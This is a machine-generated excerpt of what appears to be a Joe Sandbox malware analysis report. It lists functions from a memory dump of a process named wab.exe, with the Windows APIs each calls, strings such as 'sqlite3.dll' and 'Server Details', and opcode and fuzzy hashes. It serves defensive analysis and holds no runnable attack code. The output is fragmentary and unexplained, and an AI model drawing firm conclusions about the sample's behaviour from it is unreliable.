                                                  • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                  • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                  Function 00409070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadMenuA.USER32(00000000), ref: 00409078
                                                  • sprintf.MSVCRT ref: 0040909B
                                                    • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                    • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                    • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                    • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                    • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                    • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                    • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                  • String ID: menu_%d
                                                  • API String ID: 1129539653-2417748251
                                                  • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                  • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                  • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                  • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                  Function 004070E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _mbscpy.MSVCRT ref: 004070EB
                                                    • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                    • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                  • _mbscat.MSVCRT ref: 004070FA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _mbscat$_mbscpystrlen
                                                  • String ID: sqlite3.dll
                                                  • API String ID: 1983510840-1155512374
                                                  • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                  • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                  • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                  • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                  Function 004033B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileString
                                                  • String ID: A4@$Server Details
                                                  • API String ID: 1096422788-4071850762
                                                  • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                  • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                  • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                  • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                  Function 004161CB Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID:
                                                  • API String ID: 3510742995-0
                                                  • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                  • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                  • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                  • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8